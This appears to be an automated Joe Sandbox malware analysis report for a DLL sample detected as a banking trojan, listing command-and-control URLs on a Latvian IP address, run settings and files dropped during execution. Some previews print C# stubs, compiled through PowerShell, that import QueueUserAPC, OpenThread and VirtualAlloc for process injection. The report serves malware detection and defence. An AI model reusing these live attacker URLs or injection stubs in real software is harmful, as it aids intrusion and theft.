                      http://94.140.115.8/drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlktrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://94.140.115.8/drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://94.140.115.8/37rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.484931733.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://94.140.115.8/drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      94.140.115.8
                      		unknownLatvia
                      		43513NANO-ASLVtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:617386
                      Start date and time: 28/04/202215:46:372022-04-28 15:46:37 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 20s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:626a97fea05c8.pdf.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:31
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@24/19@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.1% (good quality ratio 18.3%)
                      • Quality average: 82.2%
                      • Quality standard deviation: 27%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 5140 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:47:50API Interceptor1x Sleep call for process: rundll32.exe modified
                      15:48:54API Interceptor28x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):11606
                      Entropy (8bit):4.883977562702998
                      Encrypted:false
                      SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                      MD5:243581397F734487BD471C04FB57EA44
                      SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                      SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                      SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                      Malicious:false
                      Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.9260988789684415
                      Encrypted:false
                      SSDEEP:3:Nlllulb/lj:NllUb/l
                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                      Malicious:false
                      Preview:@...e................................................@..........

                      C:\Users\user\AppData\Local\Temp\RES4ECA.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                      Category:dropped
                      Size (bytes):1336
                      Entropy (8bit):3.979625188103071
                      Encrypted:false
                      SSDEEP:24:Hegm9nacV8xdaHahKdNwI+ycuZhNMbakSVUPNnq9Sd:NYQKdm1ulMba3V0q9C
                      MD5:3CE142767A9B97FD635A96E92F0D2370
                      SHA1:8E1053965C0BA510CC8F994E49BF8C228A95DA78
                      SHA-256:799E2AE5418FF420E945FB8C0DBDD86FAA5309FC215058F3AB9904CC929A9B5F
                      SHA-512:848F8635A70C773462C9336B7C03F6F2CE0481A9FFA2A7AF37C38D7D982EA9D4FD847F9C76B07AD20B2AC8D4F94B9A318E4096351A1C5B237E4D74DCE544DEDE
                      Malicious:false
                      Preview:L.....kb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........V....c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP..................F..l_..Y.. ..u...........7.......C:\Users\user\AppData\Local\Temp\RES4ECA.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.i.r.2.n.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                      C:\Users\user\AppData\Local\Temp\RES6B2B.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):3.976961351921599
                      Encrypted:false
                      SSDEEP:24:H6gzW91PaaaHNhKdNwI+ycuZhNMrDakStrMPNnq92d:a2P7Kdm1ulMrDa3trcq9G
                      MD5:4BE202B8FFD9174BDEF52EC7E55C7906
                      SHA1:EC109D99A4D8813FF783195C87B7491208CF833D
                      SHA-256:880A8FB061DED10C23BBBC483FB6100CDC51FA28F37D4005A4EC26FE7473B120
                      SHA-512:CCEE6F17E704887F3B54FFFB247E5407D5F6C58C5B5B58F8D5D3F355093178083ECAF081256C4DB60E4E2B7BFEE7123A879E8AE6A19FBD882C6EE236A0D839C1
                      Malicious:false
                      Preview:L.....kb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP..................k...Oo+H`Bx2...........7.......C:\Users\user\AppData\Local\Temp\RES6B2B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.x.4.3.i.m.o.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbj0ibhp.0cz.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptawa3qf.k1u.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0939256831440654
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWbak7YnqqVUPN5Dlq5J:+RI+ycuZhNMbakSVUPNnqX
                      MD5:CF46BD1C6C5FB90159FFE520B19275E8
                      SHA1:DB4BDD0FDA0C8D1F12E9162863B57A7477F92E4A
                      SHA-256:9F41CE2E8F26B112537D43334C2C9CC8F0D14C94654072FC626E42EA7B0CA275
                      SHA-512:F4D926FEE8DB667423B7FB7D90AE53BE0723925961E1C0326E1400FC0B86659A7ED1580D396A8EC2FB4524D01D1215F221CB58AC36C2A217D703ACD0A161CBC6
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.i.r.2.n.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.y.i.r.2.n.w.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                      C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):375
                      Entropy (8bit):5.211111739770197
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fvfVFn0zxs7+AEszIN723fvfVtBH:p37Lvkmb6K2aN6WZETaNtBH
                      MD5:6BF76C5DB89716E62BE656A1DDC2F3D3
                      SHA1:12F9900BC23C58B611E2E191853D999519EB10D0
                      SHA-256:27198683AF1F6DF27E2092AC9392DDEE2AEFD8E222CBA143853884A635AC19E9
                      SHA-512:301690B27687327CE67B74BB675E9BD96EE7182E7B364230B48499AAAD69F8C17E5221A2A97E6B1558DC704CD5F14DF44C2C638D9F81A077BCAB16167AF0747E
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.0.cs"

                      C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.612675918078629
                      Encrypted:false
                      SSDEEP:24:etGSe8OmU0t3lm85xWAseO4zffQ64pfUPtkZfK1WcVUWI+ycuZhNMbakSVUPNnq:6YXQ3r5xNO2fQfUuJK1J31ulMba3V0q
                      MD5:68E8A0766C7D2D95BF16051A2936E45D
                      SHA1:D46D386399E735A5679DA3751B03B47A335FA015
                      SHA-256:5EAABC93330EAB66786C30CB04CBE6E0EA65ECF27ADA1046E73F54DA3DB9BB7D
                      SHA-512:D8AB480F92EB1CD7F00EE3B91F571A6448640792ACD4ED01944B1C638F118FAE04A3847FF9B47A7762234BB424A3E63715696D55022A989B455E3D1CED5DC88E
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                      C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):872
                      Entropy (8bit):5.301600433637405
                      Encrypted:false
                      SSDEEP:24:AId3ka6K2a1ETa0KaM5DqBVKVrdFAMBJTH:Akka6C1E+0KxDcVKdBJj
                      MD5:8285E9CFFC7EA99FF8518FC6A0161E22
                      SHA1:85AA835E715D954EAA4E5562EA3445BE8CEA66EA
                      SHA-256:2644B6BD5CDAD33BFBD9663889FF5341F7D53BDD494A789AE362FFC5D1896D88
                      SHA-512:94845320BF76AEDDB1896D70AC5592C73C81FC0E9191E2683F121D1CC89BD69F76011A2B95FDB7979072C71121D5E6588D007AEC19A044A1DB8795AF07EB7ABA
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.101326691421469
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGWSeqak7YnqqtWSebPN5Dlq5J:+RI+ycuZhNMrDakStrMPNnqX
                      MD5:A918BB6B1F9E004F6F2B4860427832EE
                      SHA1:B9F22EAC7D576F4D6CE38AD5BF43CF338025D6BE
                      SHA-256:86BA7BDC18FD38C38DAD600263BBE93A126B4E7EE408E7C0FA9A24A4F0D68871
                      SHA-512:01FBEB47C5447DD7B200B9411244923E8F7FC054F8FFB7DE37E37D7948713A073A66EB25265E9D022EA0F396D5642A760450993C5F14B31C1A1E09CF3A479899
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.x.4.3.i.m.o.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.x.4.3.i.m.o.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                      C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):375
                      Entropy (8bit):5.209435253328532
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fbbZNlJUzxs7+AEszIN723fbbZN9:p37Lvkmb6K2a3ZNAWZETa3ZN9
                      MD5:72EF573DBCB3842107940910BE495A4D
                      SHA1:6567A1D61AE2299D6004D7F7AE9E36D10C8AAE91
                      SHA-256:7476C3596E416ABBC227D46DD61C087BF4F0311354D4421F125EED23B853D023
                      SHA-512:528400D1E12D4CCBFE9E68708230A6F21036204ABB5A8513B6900D1C3656A13155C408ADC0ECEBD5C960FCFCB24500D5D8BEABFB21E822FFC46FF4BFDCA91DAB
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.0.cs"

                      C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.592584166244639
                      Encrypted:false
                      SSDEEP:24:etGSX/u2Bg85z7xlfwZD6kgdWqtkZfS16XWI+ycuZhNMrDakStrMPNnq:6mYb5hFCD69WdJS16G1ulMrDa3trcq
                      MD5:D2F013A4FCAB1ED0A4E84B6A560A263D
                      SHA1:F4DADE0BDA352F9DA63491694364E93E1AE04B78
                      SHA-256:D1ACC2076ED115F9CC0E3F2E9E78D70341A59DB10C3F615064F9334D8A9DE5EE
                      SHA-512:7EED1FE7527C1A4BE6B51D70FDC263E8A83DEA01730E8CD61E2256BF0DF7A687D6FC4D840237DEE00BD3F4B6A27EDC86AD8C9CE6C0382AD143866681AFFF4F24
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                      C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):872
                      Entropy (8bit):5.304211217463544
                      Encrypted:false
                      SSDEEP:24:AId3ka6K2atETacKaM5DqBVKVrdFAMBJTH:Akka6CtE+cKxDcVKdBJj
                      MD5:65A1799FB3C9582C28E5ADC1D824EF07
                      SHA1:16A1FCDA2B884B1B7BC03EAC5158FDBF71E92AFA
                      SHA-256:ECDD48BFBDBC2317260CB1B7DB10A7B0448F48AF83C956E717F025B26257128A
                      SHA-512:EFD86B882FD38490C7562BB49DD2DF8ACF78CD27DB7234C7E2241565F899BB5E8DFDD7B5FEFE2BFD69A62D7E0213F9DD7CA16119BFB6198A0543F327782C5C78
                      Malicious:false
